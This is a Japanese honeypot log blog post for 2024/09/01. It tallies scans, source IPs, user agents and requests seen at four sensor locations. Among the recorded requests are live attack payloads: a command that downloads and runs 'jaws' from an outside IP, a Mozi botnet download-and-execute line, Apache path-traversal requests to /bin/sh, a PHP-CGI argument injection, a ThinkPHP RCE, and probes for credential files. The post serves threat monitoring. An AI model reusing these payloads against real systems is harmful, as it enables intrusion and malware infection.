コンニチハレバレトシタアオゾラ

つれづれなるままに、日暮らし、ぶろぐにむかひて、心にうつりゆくよしなしごとを、そこはかとなく書きつくれば、

2024/09/01 ハニーポット(仮) 観測記録

honeypot

ハニーポット(仮) 観測記録 2024/09/01分です。

特徴
共通

Spring Bootの脆弱性を狙うアクセス
CensysInspectによるスキャン行為
curlによるスキャン行為
zgrabによるスキャン行為
/.envへのスキャン行為
/.gitへのスキャン行為

Location:JP

.jsへのスキャン行為
/.awsへのスキャン行為
configファイルへのスキャン行為

を確認しました。

/shellに対する以下のアクセスを確認しました。

cd /tmp;
rm -rf *;
wget  45.145.165.64/jaws;
sh /tmp/jaws
Location:US

Spring Cloud Gateway脆弱性(CVE-2022-22947)を狙うアクセス
phpMyAdminへのスキャン行為

を確認しました。

/shellに対する以下のアクセスを確認しました。

cd /tmp;
rm -rf *;
wget  45.145.165.64/jaws;
sh /tmp/jaws
Location:UK

Apache HTTP Serverの脆弱性(CVE-2021-41773)を狙うアクセス
PHPUnit脆弱性(CVE-2017-9841)を狙うアクセス
PHP脆弱性(CVE-2024-4577)を狙うアクセス
Spring Cloud Gateway脆弱性(CVE-2022-22947)を狙うアクセス
ThinkPHPの脆弱性を狙うアクセス

を確認しました。

/shellに対する以下のアクセスを確認しました。

cd /tmp;
rm -rf *;
wget  45.145.165.64/jaws;
sh /tmp/jaws
Location:SG

Apache HTTP Serverの脆弱性(CVE-2021-41773)を狙うアクセス
PHPUnit脆弱性(CVE-2017-9841)を狙うアクセス
PHP脆弱性(CVE-2024-4577)を狙うアクセス
Spring Cloud Gateway脆弱性(CVE-2022-22947)を狙うアクセス
ThinkPHPの脆弱性を狙うアクセス
Nmap Scripting Engineによるスキャン行為
.jsへのスキャン行為
Apache Tomcatへのスキャン行為

を確認しました。

/shellに対する以下のアクセスを確認しました。

cd /tmp;
rm -rf *;
wget  45.145.165.64/jaws;
sh /tmp/jaws
アクセス数推移

JP:総アクセス数:150 (前日比:-271)
US:総アクセス数:67 (前日比:-210)
UK:総アクセス数:108 (前日比:-295)
SG:総アクセス数:158 (前日比:-89)

都合により GET / HTTP/1.1 POST / HTTP/1.1 は除いています。

Location:JP

送信元IPアドレス一覧

件数 送信元IPアドレス
1 5.8.11.202 Russia
1 13.64.193.92 United States
1 36.137.146.143 China
10 45.58.184.159 United States
1 45.134.79.103 Romania
1 52.228.152.124 United States
1 54.234.3.213 United States
1 68.183.45.205 United States
2 71.6.134.233 United States
2 71.6.134.235 United States
2 80.82.77.202 United Kingdom
2 91.92.243.20 Bulgaria
3 91.92.249.4 Bulgaria
2 93.174.93.12 United Kingdom
1 103.67.163.199 private ip address
1 115.68.163.153 South Korea
4 135.125.244.48 France
6 135.125.246.189 France
10 143.244.143.137 United States
1 156.215.34.29 Egypt
77 159.65.238.5 United States
4 164.52.24.188 China
1 167.94.146.61 United States
1 167.99.83.193 United States
1 172.105.128.12 United States
1 172.202.177.182 United Kingdom
1 172.206.140.188 United Kingdom
1 185.180.140.5 Portugal
4 185.254.196.173 Ukraine
1 197.62.200.15 Egypt
2 198.235.24.158 United States
1 199.45.154.123 United States
2 205.210.31.229 United States

UserAgent一覧

件数 UserAgent
24 -
1 Mozilla/5.0 (Linux; Android 10; ELE-L29) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
1 Mozilla/5.0 (Linux; Android 9; moto g(6) plus) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
2 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.0.0 Safari/537.36
5 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36
2 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36
1 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
1 Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.60 Safari/537.36
76 Mozilla/5.0 (X11 Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36
1 Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36 OPR/60.0.3255.70
14 Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36
2 Mozilla/5.0 (compatible; CensysInspect/1.1; +https[:]//about[.]censys[.]io/)
3 Mozilla/5.0 zgrab/0.x
2 Mozilla/5.0
1 Opera/9.80 (Windows NT 6.1; WOW64) Presto/2.12.388 Version/12.16
1 Python-urllib/3.12
1 curl/8.1.2
1 python-requests/2.22.0
1 python-requests/2.26.0
10 python-requests/2.32.3

リクエスト内容一覧

件数 Method Request Protocol
1 MGLNDD_18.179.20.5_80\n
1 \x16\x03\x01\x01\xfa\x01
2 \x16\x03\x01\x02
9 \x16\x03\x01
5 \x16\x03\x02\x01o\x01
1 ``
1 GET /.aws/ HTTP/1.1
1 GET /.aws/config HTTP/1.1
2 GET /.aws/credentials HTTP/1.1
1 GET /.config HTTP/1.1
1 GET /.ec2/credentials.conf HTTP/1.1
2 GET /.env.bak HTTP/1.1
1 GET /.env.example/debug/default/view?panel=config HTTP/1.1
1 GET /.env.old HTTP/1.1
1 GET /.env_bak HTTP/1.1
1 GET /.env_old HTTP/1.1
18 GET /.env HTTP/1.1
1 GET /.git/HEAD HTTP/1.1
2 GET /.git/config HTTP/1.1
1 GET /.local HTTP/1.1
1 GET /.ses/credentials HTTP/1.1
1 GET //%C0 HTTP/1.1
1 GET //.aws/credentials HTTP/1.1
1 GET //.env.dev/blogs/.env HTTP/1.1
1 GET //.env.example HTTP/1.1
1 GET //.env.php HTTP/1.1
1 GET //.env/redmine/.env HTTP/1.1
1 GET //.production HTTP/1.1
1 GET //admin/.env HTTP/1.1
1 GET //admin/config HTTP/1.1
1 GET //administrator/.env HTTP/1.1
1 GET //api/.env HTTP/1.1
2 GET //app/.env HTTP/1.1
1 GET //app/etc/env.php HTTP/1.1
1 GET //app_dev[.]php/_profiler/phpinfo HTTP/1.1
1 GET //assets/.env HTTP/1.1
1 GET //backend/.env HTTP/1.1
1 GET //blog/.env HTTP/1.1
1 GET //client/.env HTTP/1.1
1 GET //config/php.ini HTTP/1.1
1 GET //config[.]properties HTTP/1.1
1 GET //config HTTP/1.1
1 GET //core/Datavase/.env HTTP/1.1
1 GET //cron/.env HTTP/1.1
1 GET //cronlab/.env HTTP/1.1
2 GET //database/.env HTTP/1.1
2 GET //debug/default/view.html HTTP/1.1
1 GET //docs/.env HTTP/1.1
1 GET //download/.env HTTP/1.1
1 GET //en/.env/tools/.env HTTP/1.1
1 GET //exapi/.env HTTP/1.1
1 GET //frontend/web/debug/default/view HTTP/1.1
1 GET //gists/cache HTTP/1.1
1 GET //index[.]html HTTP/1.1
1 GET //lab/.env HTTP/1.1
1 GET //laravel/.env HTTP/1.1
1 GET //lib/.env HTTP/1.1
1 GET //main/.env HTTP/1.1
1 GET //main[.]js HTTP/1.1
1 GET //phpinfo[.]php/test.php HTTP/1.1
1 GET //phpinfo HTTP/1.1
1 GET //psnlink/.env HTTP/1.1
1 GET //public/.env HTTP/1.1
1 GET //sapi/debug/default/view.remote HTTP/1.1
1 GET //shared/.env HTTP/1.1
1 GET //site/.env HTTP/1.1
1 GET //sitemaps/.env/saas/.env HTTP/1.1
1 GET //sites/.env HTTP/1.1
1 GET //test HTTP/1.1
2 GET //tool/view/phpinfo.view.php HTTP/1.1
1 GET //uploads/.env HTTP/1.1
1 GET //v1/.env HTTP/1.1
1 GET //v2/.env HTTP/1.1
1 GET //vendor/.env HTTP/1.1
1 GET //web/.env HTTP/1.1
1 GET //web/debug/default/view HTTP/1.1
1 GET /1.php HTTP/1.1
3 GET /_profiler/phpinfo HTTP/1.1
1 GET /actuator/health HTTP/1.1
1 GET /aws.yml HTTP/1.1
2 GET /config/aws.yml HTTP/1.1
1 GET /console HTTP/1.1
1 GET /core/.env/core/app/.env HTTP/1.1
1 GET /druid/index.html HTTP/1.1
7 GET /favicon.ico HTTP/1.1
1 GET /form.html HTTP/1.1
1 GET /geoip/ HTTP/1.1
1 GET /hudson HTTP/1.1
2 GET /images/raisecom/ HTTP/1.1
2 GET /info.php HTTP/1.1
1 GET /password.php HTTP/1.1
2 GET /phpinfo.php HTTP/1.1
2 GET /phpinfo HTTP/1.1
1 GET /ses/credentials.conf HTTP/1.1
2 GET /shell?cd+/tmp;rm+-rf+*;wget+ 45.145.165.64/jaws;sh+/tmp/jaws
1 GET /systembc/password.php HTTP/1.1
1 GET /t4 HTTP/1.1
1 GET /upl.php HTTP/1.1
1 HEAD / HTTP/1.1
Location:US

送信元IPアドレス一覧

件数 送信元IPアドレス
1 2.57.122.208 Romania
1 4.151.38.181 United States
1 4.151.230.193 United States
1 4.224.62.71 United States
3 5.8.11.202 Russia
1 36.50.176.85 China
2 36.69.239.92 Indonesia
1 40.118.214.5 United States
1 41.234.157.101 Egypt
1 45.79.172.21 United States
1 45.156.129.46 Hungary
1 46.101.89.154 United States
5 51.158.205.67 France
2 54.36.115.221 France
7 54.37.79.75 France
1 57.152.56.145 Switzerland
1 57.154.48.187 Switzerland
5 62.210.90.217 France
1 64.62.156.62 United States
1 65.49.1.75 United States
1 77.237.241.114 Spain
2 80.82.77.202 United Kingdom
2 83.97.73.245 Germany
3 91.92.249.4 Bulgaria
1 92.114.59.139 Spain
2 94.156.68.162 Bulgaria
2 103.133.111.209 Vietnam
1 104.40.58.197 United States
1 138.68.162.205 United States
1 139.59.101.104 Singapore
1 161.35.75.215 United States
2 167.94.145.107 United States
2 167.94.146.54 United States
1 170.64.209.238 United States
1 197.52.99.203 Egypt
2 198.235.24.45 United States
2 198.235.24.84 United States
2 199.45.155.89 United States

UserAgent一覧

件数 UserAgent
22 -
1 Go-http-client/1.1
1 Midori/0.1.10 (X11; Linux i686; U; en-us) WebKit/(531).(2)
1 Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10.5; en-US; rv:1.9.0.3) Gecko/2008092414 Firefox/3.0.3
8 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.3
1 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36
1 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36 Edge/12.0
1 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
2 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
1 Mozilla/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36
1 Mozilla/5.0 (X11; CrOS x86_64 8172.45.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.64 Safari/537.36
1 Mozilla/5.0 (X11; Linux i686; rv:32.0) Gecko/20100101 Firefox/32.0
14 Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36
1 Mozilla/5.0 (X11; Linux x86_64; rv:107.0) Gecko/20100101 Firefox/107.0
1 Mozilla/5.0 (X11; U; Linux i686; en-US) AppleWebKit/532.8 (KHTML, like Gecko) Chrome/4.0.277.0 Safari/532.8
3 Mozilla/5.0 (compatible; CensysInspect/1.1; +https[:]//about[.]censys[.]io/)
4 Mozilla/5.0 zgrab/0.x
1 Mozilla/5.0
2 curl/7.81.0

リクエスト内容一覧

件数 Method Request Protocol
1 MGLNDD_34.68.118.83_80\n
1 \x16\x03\x01\x01\xfb\x01
6 \x16\x03\x01
5 \x16\x03\x02\x01o\x01
1 ``
1 CONNECT www[.]google[.]com:443 HTTP/1.1
16 GET /.env HTTP/1.1
2 GET /.git/config HTTP/1.1
1 GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1
2 GET /_profiler/phpinfo HTTP/1.1
1 GET /actuator/gateway/routes HTTP/1.1
2 GET /actuator/health HTTP/1.1
2 GET /ads.txt HTTP/1.1
2 GET /app-ads.txt HTTP/1.1
1 GET /cdn-cgi/trace HTTP/1.1
1 GET /druid/index.html HTTP/1.1
7 GET /favicon.ico HTTP/1.1
1 GET /hudson HTTP/1.1
1 GET /login HTTP/1.1
2 GET /sellers.json HTTP/1.1
2 GET /shell?cd+/tmp;rm+-rf+*;wget+ 45.145.165.64/jaws;sh+/tmp/jaws
1 GET /webui/ HTTP/1.1
2 HEAD / HTTP/1.1
1 HEAD /phpmyadmin/index.php HTTP/1.1
2 HEAD /robots.txt HTTP/1.0
3 PRI * HTTP/2.0
Location:UK

送信元IPアドレス一覧

件数 送信元IPアドレス
1 4.156.21.121 United States
1 13.83.43.8 United States
1 20.118.71.70 United States
1 36.50.176.85 China
1 36.69.239.92 Indonesia
5 51.158.37.190 France
11 54.36.115.221 France
6 57.129.23.166 France
1 64.62.197.236 United States
1 65.49.20.66 United States
2 80.82.77.202 United Kingdom
2 83.97.73.245 Germany
3 91.92.249.4 Bulgaria
2 94.156.68.104 Bulgaria
2 94.156.68.162 Bulgaria
1 103.114.107.59 Vietnam
1 104.209.33.45 United States
1 117.245.35.158 India
1 134.209.29.68 United States
1 138.68.152.233 United States
1 139.59.101.104 Singapore
1 139.59.180.18 Singapore
1 159.65.22.74 United States
2 162.142.125.38 United States
1 167.71.136.96 United States
2 167.94.138.51 United States
2 167.94.146.60 United States
1 172.168.155.151 United States
1 192.99.7.195 Canada
1 192.155.90.118 United States
44 193.151.155.77 Iran
1 197.39.62.249 Egypt
2 198.235.24.23 United States
2 198.235.24.99 United States
1 209.38.167.200 United States

UserAgent一覧

件数 UserAgent
21 -
44 Custom-AsyncHttpClient
1 Go-http-client/1.1
1 Googlebot-Image/1.0
1 Mozilla/5.0 (Linux; Android 8.0.0; SM-G935U) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.111 Mobile Safari/537.36
1 Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30
1 Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3880.4 Safari/537.36
1 Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36
4 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.3
2 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
1 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.51 Safari/537.36
17 Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36
3 Mozilla/5.0 (compatible; CensysInspect/1.1; +https[:]//about[.]censys[.]io/)
1 Mozilla/5.0 (iPhone; CPU OS 13_3_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) FxiOS/28.0 Mobile/15E148 Safari/605.1.15
4 Mozilla/5.0 zgrab/0.x
2 Mozilla/5.0
1 Opera/9.60 (J2ME/MIDP; Opera Mini/4.2.14320/554; U; cs) Presto/2.2.0
1 Opera/9.80 (J2ME/MIDP; Opera Mini/8.0.35626/37.8918; U; en) Presto/2.12.423 Version/12.16
1 curl/7.81.0

リクエスト内容一覧

件数 Method Request Protocol
1 27;wget%20http[:]//%s:%d/Mozi.m%20-O%20->%20/tmp/Mozi.m;chmod%20777%20/tmp/Mozi.m;/tmp/Mozi.m%20dlink.mips%27$ HTTP/1.0
1 MGLNDD_132.145.66.34_80\n
1 \x16\x03\x01\x01\xfc\x01
6 \x16\x03\x01
2 \x16\x03\x02\x01o\x01
5 ``
1 CONNECT www[.]google[.]com:443 HTTP/1.1
22 GET /.env HTTP/1.1
1 GET /.git/config HTTP/1.1
1 GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1
1 GET /V2/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
2 GET /_profiler/phpinfo HTTP/1.1
1 GET /actuator/gateway/routes HTTP/1.1
2 GET /actuator/health HTTP/1.1
1 GET /admin/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 GET /ads.txt HTTP/1.1
1 GET /api/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 GET /app-ads.txt HTTP/1.1
1 GET /app/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 GET /apps/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 GET /backup/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 GET /blog/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
2 GET /cdn-cgi/trace HTTP/1.1
1 GET /cms/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 GET /crm/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 GET /demo/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 GET /druid/index.html HTTP/1.1
4 GET /favicon.ico HTTP/1.1
1 GET /hudson HTTP/1.1
1 GET /index.php?lang=../../../../../../../../tmp/index1 HTTP/1.1
1 GET /index.php?lang=../../../../../../../../usr/local/lib/php/pearcmd&+config-create+/&/<?echo(md5(\"hi\"));?>+/tmp/index1.php HTTP/1.1
1 GET /index.php?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello HTTP/1.1
1 GET /laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 GET /lib/phpunit/Util/PHP/eval-stdin.php HTTP/1.1
1 GET /lib/phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1
1 GET /lib/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 GET /lib/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 GET /lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 GET /panel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 GET /phpunit/Util/PHP/eval-stdin.php HTTP/1.1
1 GET /phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1
1 GET /phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 GET /phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 GET /public/index.php?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello HTTP/1.1
1 GET /public/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 GET /sellers.json HTTP/1.1
1 GET /shell?cd+/tmp;rm+-rf+*;wget+ 45.145.165.64/jaws;sh+/tmp/jaws
1 GET /test/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 GET /testing/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 GET /tests/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 GET /vendor/phpunit/Util/PHP/eval-stdin.php HTTP/1.1
1 GET /vendor/phpunit/phpunit/LICENSE/eval-stdin.php HTTP/1.1
1 GET /vendor/phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1
1 GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 GET /vendor/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 GET /vendor/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 GET /webui/ HTTP/1.1
1 GET /workspace/drupal/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 GET /ws/ec/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 GET /ws/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 GET /www/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 GET /yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 GET /zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 HEAD / HTTP/1.1
1 HEAD /robots.txt HTTP/1.0
1 POST /cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/bin/sh HTTP/1.1
1 POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh HTTP/1.1
1 POST /hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1
3 PRI * HTTP/2.0
Location:SG

送信元IPアドレス一覧

件数 送信元IPアドレス
1 4.151.36.113 United States
1 8.219.126.6 Singapore
1 13.91.165.190 United States
1 36.69.239.92 Indonesia
2 41.233.60.201 Egypt
29 43.156.43.9 Singapore
1 45.33.80.243 United States
3 45.95.169.177 Croatia
1 45.156.129.48 Hungary
4 45.190.160.59 Brazil
1 47.84.78.79 United States
1 48.217.212.219 United States
8 54.36.115.221 France
5 54.37.79.75 France
1 59.52.178.94 China
1 64.23.166.91 United States
1 65.49.20.66 United States
1 80.82.77.202 United Kingdom
2 83.97.73.245 Germany
3 91.92.243.20 Bulgaria
2 91.92.249.4 Bulgaria
2 93.174.93.12 United Kingdom
1 94.156.68.104 Bulgaria
2 94.156.68.162 Bulgaria
1 95.214.54.181 Poland
44 103.173.227.187 Vietnam
1 111.224.248.101 China
1 121.237.36.28 China
1 123.138.72.206 China
1 138.68.143.194 United States
1 156.215.60.232 Egypt
1 156.219.212.37 Egypt
1 156.223.116.245 Egypt
2 162.142.125.223 United States
4 164.52.24.188 China
1 165.22.127.140 United States
1 172.104.11.4 United States
2 172.174.248.107 Germany
1 172.206.147.153 United Kingdom
1 172.212.61.133 United Kingdom
1 172.245.20.199 United States
1 184.105.247.194 United States
1 185.180.140.6 Portugal
1 192.155.90.118 United States
1 198.46.200.132 United States
2 198.235.24.107 United States
2 198.235.24.131 United States
2 199.45.154.148 United States
2 199.45.155.96 United States
1 209.38.25.163 United States
1 220.200.176.87 China
1 221.199.100.136 China
3 222.92.122.14 China

UserAgent一覧

件数 UserAgent
34 -
1 BlackBerry8300/4.2.2 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/107 UP.Link/6.2.3.15.0
44 Custom-AsyncHttpClient
1 Dalvik/2.1.0 (Linux; U; Android 9.0; ZTE BA520 Build/MRA58K)
1 Mozilla/5.0 (Linux; Android 8.0.0; Pixel XL Build/OPR6.170623.012) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.107 Mobile Safari/537.36
1 Mozilla/5.0 (Linux; Android 9; SM-G973U1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.111 Mobile Safari/537.36
1 Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.60 Safari/537.36
2 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36
1 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36
2 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
2 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
1 Mozilla/5.0 (Windows NT 6.1; ) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.156 Not(A:Brand/24 YaBrowser/24.4.1.901 Yowser/2.5 Safari/537.36
1 Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.154 Safari/537.36 OPR/20.0.1387.91
1 Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36
29 Mozilla/5.0 (Windows; U; MSIE 9.0; WIndows NT 9.0; en-US))
19 Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36
1 Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.0.7) Gecko/20060909 Firefox/1.5.0.7 MG(Novarra-Vision/6.9)
3 Mozilla/5.0 (compatible; CensysInspect/1.1; +https[:]//about[.]censys[.]io/)
2 Mozilla/5.0 (compatible; Nmap Scripting Engine; https[:]//nmap[.]org/book/nse.html)
4 Mozilla/5.0 zgrab/0.x
1 SAMSUNG-S8000/S8000XXIF3 SHP/VPP/R5 Jasmine/1.0 Nextreaming SMM-MMS/1.2.0 profile/MIDP-2.1 configuration/CLDC-1.1 FirePHP/0.3
1 User-Agent:Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR 1.0.3705
1 curl/7.75.0
4 xfa1

リクエスト内容一覧

件数 Method Request Protocol
3 -
1 MGLNDD_13.67.44.234_80
1 \x16\x03\x01\x01\x04\x01
1 \x16\x03\x01\x01\xfb\x01
2 \x16\x03\x01\x02
12 \x16\x03\x01
3 \x16\x03\x02\x01o\x01
1 ``
22 GET /.env HTTP/1.1
2 GET /.git/config HTTP/1.1
1 GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1
1 GET /V2/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
3 GET /_profiler/phpinfo HTTP/1.1
1 GET /actuator-configprops HTTP/1.1
1 GET /actuator-env HTTP/1.1
1 GET /actuator/;/env HTTP/1.1
1 GET /actuator/ HTTP/1.1
1 GET /actuator/env HTTP/1.1
1 GET /actuator/gateway/routes HTTP/1.1
2 GET /actuator/health HTTP/1.1
1 GET /actuator/mappings HTTP/1.1
4 GET /admin/assets/js/views/login.js HTTP/1.0
1 GET /admin/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 GET /api/actuator/;/env HTTP/1.1
1 GET /api/actuator/ HTTP/1.1
1 GET /api/actuator/env HTTP/1.1
1 GET /api/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 GET /app/actuator/ HTTP/1.1
1 GET /app/actuator/env HTTP/1.1
1 GET /app/env HTTP/1.1
1 GET /app/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 GET /apps/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 GET /backup/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 GET /blog/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 GET /cms/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 GET /console HTTP/1.1
1 GET /crm/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 GET /demo/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 GET /dev/actuator/ HTTP/1.1
1 GET /dev/actuator/env HTTP/1.1
1 GET /dev/env HTTP/1.1
1 GET /diagnostics/ HTTP/1.1
1 GET /druid/index.html HTTP/1.1
1 GET /env.json HTTP/1.1
1 GET /env HTTP/1.1
8 GET /favicon.ico HTTP/1.1
1 GET /healthcheck-ui/index.html HTTP/1.1
1 GET /hudson HTTP/1.1
1 GET /index.php?lang=../../../../../../../../tmp/index1 HTTP/1.1
1 GET /index.php?lang=../../../../../../../../usr/local/lib/php/pearcmd&+config-create+/&/<?echo(md5(\"hi\"));?>+/tmp/index1.php HTTP/1.1
1 GET /index.php?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello HTTP/1.1
1 GET /info HTTP/1.1
1 GET /laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 GET /lib/phpunit/Util/PHP/eval-stdin.php HTTP/1.1
1 GET /lib/phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1
1 GET /lib/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 GET /lib/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 GET /lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 GET /login HTTP/1.1
1 GET /management/;/env HTTP/1.1
1 GET /management/ HTTP/1.1
